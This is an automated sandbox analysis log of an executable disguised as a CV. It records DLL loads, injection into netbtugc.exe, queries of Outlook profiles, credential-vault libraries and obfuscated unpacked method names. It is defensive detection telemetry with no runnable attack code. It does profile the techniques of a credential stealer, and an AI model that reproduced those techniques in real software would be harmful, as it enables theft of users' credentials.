                Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Maryam Farokhi-PhD- CV-1403.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Maryam Farokhi-PhD- CV-1403.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Maryam Farokhi-PhD- CV-1403.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: qesm.pdb source: Maryam Farokhi-PhD- CV-1403.exe
                Source: Binary string: qesm.pdbSHA256 source: Maryam Farokhi-PhD- CV-1403.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ptzMmYcrKro.exe, 00000003.00000000.29988243564.0000000000A8E000.00000002.00000001.01000000.0000000A.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33208908459.0000000000A8E000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: wntdll.pdbUGP source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30076327355.0000000003298000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30072902814.00000000030ED000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Maryam Farokhi-PhD- CV-1403.exe, Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.33209248579.0000000003440000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33209248579.000000000356D000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30076327355.0000000003298000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30072902814.00000000030ED000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netbtugc.pdb source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064205277.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000003.32061041259.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: netbtugc.pdbGCTL source: Maryam Farokhi-PhD- CV-1403.exe, 00000002.00000002.30064205277.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp, ptzMmYcrKro.exe, 00000003.00000003.32061041259.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_019BDA6B push eax; retf 0_2_019BDA71
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004158FE pushad ; iretd 2_2_00415913
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0041195D push esp; iretd 2_2_00411998
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00411963 push esp; iretd 2_2_00411998
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0041434D pushad ; retf 2_2_00414352
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00403370 push eax; ret 2_2_00403372
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00414B71 push ss; iretd 2_2_00414B72
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004183AA push 00000057h; retf 2_2_004183BD
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004144B0 push ecx; iretd 2_2_004144C5
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00414DF1 push ebp; ret 2_2_00414DF9
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004186C3 push eax; ret 2_2_004186C6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00418768 push ss; ret 2_2_00418748
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00416771 push ss; ret 2_2_00416799
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004157EA push eax; retf 2_2_004157EB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0041778A push ds; ret 2_2_0041778B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F121AD pushad ; retf 0004h2_2_00F1223F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F408CD push ecx; mov dword ptr [esp], ecx2_2_00F408D6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F197A1 push es; iretd 2_2_00F197A8
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034421AD pushad ; retf 0004h4_2_0344223F
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034708CD push ecx; mov dword ptr [esp], ecx4_2_034708D6
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034497A1 push es; iretd 4_2_034497A8
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C633FE push ss; ret 4_2_02C63426
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C65350 push eax; ret 4_2_02C65353
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C65037 push 00000057h; retf 4_2_02C6504A
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C6B6C4 push eax; ret 4_2_02C6B6CC
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C617FE push ss; iretd 4_2_02C617FF
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C62477 push eax; retf 4_2_02C62478
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C64417 push ds; ret 4_2_02C64418
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C6B5D0 push eax; retf 4_2_02C6B5EC
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C705DB push ebp; ret 4_2_02C705DC
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C5E5EA push esp; iretd 4_2_02C5E625
                Source: Maryam Farokhi-PhD- CV-1403.exeStatic PE information: section name: .text entropy: 7.8582749593762085
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, HgeivBds7NVqSayWNn.csHigh entropy of concatenated method names: 'O1JajIHeAN', 'Qj0aECG2H2', 'ToString', 'sj0a8Gfmgp', 'Rp2amKD6eR', 'uNFaVYMPni', 'BvqaNwdiIt', 'lhuabCFjGl', 'hGSaMnJoOw', 'fCKa5U0vDh'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, g9nVgtnUJlsgPNMpPm.csHigh entropy of concatenated method names: 'bkEepn9O2W', 'jGmeXP1LZV', 'P1denQclfZ', 'nVWeQlHpCO', 'DGKeclKlFy', 'WkxexaB3Qj', 'ctoe9NIeWk', 'f5heiaAUa0', 'BBSehF8XM8', 'I3JeowAEI3'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, GO3RU76S6TZAMtABBy.csHigh entropy of concatenated method names: 'C6iZ5mEEm', 'ExPKmtYmK', 'PWEtSEG5K', 'cgoOMcbr2', 'BhlwYeRBM', 'nP449mBoM', 'utirxpBuD1n1RjNFsi', 'wjhrlyxJ7l9PGbi1wS', 'qiLUbIc3m', 'MiC3F9X4R'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, ywEXhUJoPjX4pqCpHA.csHigh entropy of concatenated method names: 'lREGesV0s1', 'kY4GahMV4H', 'YR8GGCVnl2', 'iPFGFYbXf8', 'aRqGvMlY84', 'AOFG2dgpM0', 'Dispose', 'qgWU80NknY', 'YYOUmMfLRV', 'VjdUVRGWgY'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, HGnZ4042ooQsZPhIe2.csHigh entropy of concatenated method names: 'zK1NsMyBDV', 'HVwNOqvnGx', 'nh1Vx9rfB1', 'AMpV9gBEZC', 'JtjViSQvS7', 'QYgVheuTNw', 'JOOVoetAoC', 'BVUVLO1eWc', 'vaNVlm5X1T', 'GucVpaoJI7'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, u9GUJC5UERNX76PhJ1.csHigh entropy of concatenated method names: 'RjVBYmBek1', 'oR8B8HQF3S', 'E7WBm3mjao', 'QpNBVbMOkS', 'vuhBN5H5F0', 'lx6BbRGObw', 'Q95BMoKqEx', 'TMSB5fLlUr', 'tqMBgkVkbD', 'rNxBjEcdQJ'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, D1YoUHA7HqUZG4Oeje.csHigh entropy of concatenated method names: 'G14rMIoRju', 'Axkr5BVHLG', 'Whurj47G86', 'GakrEdxGnZ', 'YhIree2L7n', 'qmArIxIBuO', 'Aq4KEkHv7y9eAU3Kin', 'oue2IUymtvo71av47G', 'pSRrr6DTHm', 'UyorBeNcEM'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, IgigkizYgoOwOjnyD8.csHigh entropy of concatenated method names: 'B0K3txnkEJ', 'SN53C1xpe7', 'i8H3wYJtXI', 'l4R3TMpSg7', 'eGW3c0QVnm', 'mJr39FgiU2', 'Vm13iq3gG7', 'oAS32gP7xY', 'Xw43uav5Mp', 'd1s3D4NueQ'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, UP9Qa4PU4A5oH3e3e9.csHigh entropy of concatenated method names: 'qeI3VnH4yL', 'aEa3NKrda4', 'aPy3bvLKEA', 'i0k3M4j90u', 'BTs3GHrxuV', 'PaB35S7cP2', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, GFg5ZrrrJmJpr6mNp12.csHigh entropy of concatenated method names: 'CIR3PmWtfK', 'Ape3zJWYpG', 'IGLFkKsd6W', 'iUkFrShhC7', 'WKEF6rtS7R', 'VZ4FB5snMy', 'GaCFAjBB4m', 'EKHFYNPNqv', 'kv9F8okP1n', 'mEQFmOKASb'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, FIoRjuCKxkBVHLGxU9.csHigh entropy of concatenated method names: 'N6Smn12ylM', 'rIPmQORvVf', 'bDZmSMethX', 'cgkmdtJWPT', 'Krbmq7od1X', 'Ykgm024Q5I', 'F3ymJx9AsA', 'pTYm7LcY1f', 'GuCmfpOBFU', 'njimPibnqH'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, b6NSTlr6eDLeTapSgWt.csHigh entropy of concatenated method names: 'ToString', 'UauFCp8GBS', 'gFBFwZ9KlN', 'tXXF4Mp4dq', 'X15FTrd74Y', 'XgXFcQRsiC', 'n5SFx583Ym', 'T1tF9q1rN3', 're0AV7N5PD0tYAn2UPn', 'tkRLEuNzd0R8FQCnGZ3'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, lR6EWImv5dYSai6swy.csHigh entropy of concatenated method names: 'Dispose', 'mX4rfpqCpH', 'y7Y6cguYpd', 'DqWQ84iFHK', 'dMwrPS3hfx', 'GVIrz3WNaP', 'ProcessDialogKey', 'chw6k7BMid', 'E866rpEKFR', 'dCM660P9Qa'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, M7namATxIBuOTN7qFm.csHigh entropy of concatenated method names: 'NaAbY0xtag', 'FGlbmf6N7u', 'oA5bN4KQ8D', 't6kbMoSZXD', 'zCTb5bdXvA', 'tmoNqHw40a', 'WrJN0tBm3O', 'fTTNJG1QC6', 'ONtN73NEI3', 'Nk4Nf5KhaX'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, E7BMidfw86pEKFRACM.csHigh entropy of concatenated method names: 'fOTGTC1yKO', 'DPsGcX99uh', 'Vf2GxNNt1b', 'N2sG9ucMkL', 'INrGi7ZcEw', 'BZRGhPg1ZQ', 'NbcGoOCk2g', 'dTKGL7BBA2', 'H0BGln3JhD', 'IbjGpVCn6f'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, Y7BlLN0KoWBvNqyD7j.csHigh entropy of concatenated method names: 'mpOa7qW9e6', 'HAmaPosMlP', 'OSsUkj3Z8Y', 'YnlUrZW59h', 'lafaHH8rrX', 'GXfaXF7pQP', 'xdMaRGHTIm', 'vX3anTCgh0', 'nn4aQV3B0Q', 'FqZaS13DJK'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, C56UGQSFELu56dFZvV.csHigh entropy of concatenated method names: 'ToString', 'zO5IHaElRp', 'BKhIchoGQb', 'ytnIxExleZ', 'Wc7I9YJuDT', 'QmkIip7qC8', 'kbZIh76Y7R', 'elUIocK9Rq', 'JSyILTulJv', 'CWQIlvvte0'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, UCOAOPrktr4U7UxP0NR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FhY3HZvgUv', 'hy63X8ocT4', 'F4q3RT9H8G', 'OYI3nGg8D6', 'iSE3QXJgDj', 'TnT3S8s4DS', 'A6l3dqr7rs'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, wmVo37whu47G86cakd.csHigh entropy of concatenated method names: 'uHfVKshP77', 'UOQVtjwppC', 'G5TVC2ljCQ', 'YhNVwAOswK', 'osfVeARa6L', 'C2YVI2svVG', 'eEfVafPIuG', 'fyNVUCNKjG', 'NhWVGhKTeP', 'TQZV3wcVP3'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, KdYkBblFN3q21HXc97.csHigh entropy of concatenated method names: 'xSyMu5aP0W', 'rDPMDHoFRO', 's92MZ6vScg', 'Hi4MKkSMV4', 'dGXMskqmMU', 'jX7MtNCwC8', 'QF2MOaqwVF', 'nSJMCKqQcE', 'HUVMwwOLMI', 'rc7M41xq7h'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, HRXIbhRp0dPPgKOIdA.csHigh entropy of concatenated method names: 'tXNWCe3tad', 'xXMWwws9kV', 'BIDWTCHCck', 'MA7WcgitbZ', 'g2vW9Zdc8i', 'yXuWi5WY3m', 'Qi7WoJG6xH', 'RHSWLSNPRw', 'oNMWpU5lNW', 'JTLWHtmaH9'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.4681ec0.2.raw.unpack, f6pnFxo6DhXlf5Ae3A.csHigh entropy of concatenated method names: 'PFkM8kcTmo', 'n0NMV0MN2c', 'j9nMbgHyJg', 'tNobP94Da5', 'OWqbzyeVGg', 'vrvMku1HZ0', 'slgMrqufrH', 'BQXM6s52Vq', 'zxxMBPYERG', 'FWcMAjoYGa'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, HgeivBds7NVqSayWNn.csHigh entropy of concatenated method names: 'O1JajIHeAN', 'Qj0aECG2H2', 'ToString', 'sj0a8Gfmgp', 'Rp2amKD6eR', 'uNFaVYMPni', 'BvqaNwdiIt', 'lhuabCFjGl', 'hGSaMnJoOw', 'fCKa5U0vDh'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, g9nVgtnUJlsgPNMpPm.csHigh entropy of concatenated method names: 'bkEepn9O2W', 'jGmeXP1LZV', 'P1denQclfZ', 'nVWeQlHpCO', 'DGKeclKlFy', 'WkxexaB3Qj', 'ctoe9NIeWk', 'f5heiaAUa0', 'BBSehF8XM8', 'I3JeowAEI3'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, GO3RU76S6TZAMtABBy.csHigh entropy of concatenated method names: 'C6iZ5mEEm', 'ExPKmtYmK', 'PWEtSEG5K', 'cgoOMcbr2', 'BhlwYeRBM', 'nP449mBoM', 'utirxpBuD1n1RjNFsi', 'wjhrlyxJ7l9PGbi1wS', 'qiLUbIc3m', 'MiC3F9X4R'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, ywEXhUJoPjX4pqCpHA.csHigh entropy of concatenated method names: 'lREGesV0s1', 'kY4GahMV4H', 'YR8GGCVnl2', 'iPFGFYbXf8', 'aRqGvMlY84', 'AOFG2dgpM0', 'Dispose', 'qgWU80NknY', 'YYOUmMfLRV', 'VjdUVRGWgY'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, HGnZ4042ooQsZPhIe2.csHigh entropy of concatenated method names: 'zK1NsMyBDV', 'HVwNOqvnGx', 'nh1Vx9rfB1', 'AMpV9gBEZC', 'JtjViSQvS7', 'QYgVheuTNw', 'JOOVoetAoC', 'BVUVLO1eWc', 'vaNVlm5X1T', 'GucVpaoJI7'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, u9GUJC5UERNX76PhJ1.csHigh entropy of concatenated method names: 'RjVBYmBek1', 'oR8B8HQF3S', 'E7WBm3mjao', 'QpNBVbMOkS', 'vuhBN5H5F0', 'lx6BbRGObw', 'Q95BMoKqEx', 'TMSB5fLlUr', 'tqMBgkVkbD', 'rNxBjEcdQJ'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, D1YoUHA7HqUZG4Oeje.csHigh entropy of concatenated method names: 'G14rMIoRju', 'Axkr5BVHLG', 'Whurj47G86', 'GakrEdxGnZ', 'YhIree2L7n', 'qmArIxIBuO', 'Aq4KEkHv7y9eAU3Kin', 'oue2IUymtvo71av47G', 'pSRrr6DTHm', 'UyorBeNcEM'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, IgigkizYgoOwOjnyD8.csHigh entropy of concatenated method names: 'B0K3txnkEJ', 'SN53C1xpe7', 'i8H3wYJtXI', 'l4R3TMpSg7', 'eGW3c0QVnm', 'mJr39FgiU2', 'Vm13iq3gG7', 'oAS32gP7xY', 'Xw43uav5Mp', 'd1s3D4NueQ'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, UP9Qa4PU4A5oH3e3e9.csHigh entropy of concatenated method names: 'qeI3VnH4yL', 'aEa3NKrda4', 'aPy3bvLKEA', 'i0k3M4j90u', 'BTs3GHrxuV', 'PaB35S7cP2', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, GFg5ZrrrJmJpr6mNp12.csHigh entropy of concatenated method names: 'CIR3PmWtfK', 'Ape3zJWYpG', 'IGLFkKsd6W', 'iUkFrShhC7', 'WKEF6rtS7R', 'VZ4FB5snMy', 'GaCFAjBB4m', 'EKHFYNPNqv', 'kv9F8okP1n', 'mEQFmOKASb'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, FIoRjuCKxkBVHLGxU9.csHigh entropy of concatenated method names: 'N6Smn12ylM', 'rIPmQORvVf', 'bDZmSMethX', 'cgkmdtJWPT', 'Krbmq7od1X', 'Ykgm024Q5I', 'F3ymJx9AsA', 'pTYm7LcY1f', 'GuCmfpOBFU', 'njimPibnqH'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, b6NSTlr6eDLeTapSgWt.csHigh entropy of concatenated method names: 'ToString', 'UauFCp8GBS', 'gFBFwZ9KlN', 'tXXF4Mp4dq', 'X15FTrd74Y', 'XgXFcQRsiC', 'n5SFx583Ym', 'T1tF9q1rN3', 're0AV7N5PD0tYAn2UPn', 'tkRLEuNzd0R8FQCnGZ3'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, lR6EWImv5dYSai6swy.csHigh entropy of concatenated method names: 'Dispose', 'mX4rfpqCpH', 'y7Y6cguYpd', 'DqWQ84iFHK', 'dMwrPS3hfx', 'GVIrz3WNaP', 'ProcessDialogKey', 'chw6k7BMid', 'E866rpEKFR', 'dCM660P9Qa'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, M7namATxIBuOTN7qFm.csHigh entropy of concatenated method names: 'NaAbY0xtag', 'FGlbmf6N7u', 'oA5bN4KQ8D', 't6kbMoSZXD', 'zCTb5bdXvA', 'tmoNqHw40a', 'WrJN0tBm3O', 'fTTNJG1QC6', 'ONtN73NEI3', 'Nk4Nf5KhaX'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, E7BMidfw86pEKFRACM.csHigh entropy of concatenated method names: 'fOTGTC1yKO', 'DPsGcX99uh', 'Vf2GxNNt1b', 'N2sG9ucMkL', 'INrGi7ZcEw', 'BZRGhPg1ZQ', 'NbcGoOCk2g', 'dTKGL7BBA2', 'H0BGln3JhD', 'IbjGpVCn6f'
                Source: 0.2.Maryam Farokhi-PhD- CV-1403.exe.7af0000.4.raw.unpack, Y7BlLN0KoWBvNqyD7j.csHigh entropy of concatenated method names: 'mpOa7qW9e6', 'HAmaPosMlP', 'OSsUkj3Z8Y', 'YnlUrZW59h', 'lafaHH8rrX', 'GXfaXF7pQP', 'xdMaRGHTIm', 'vX3anTCgh0', 'nn4aQV3B0Q', 'FqZaS13DJK'
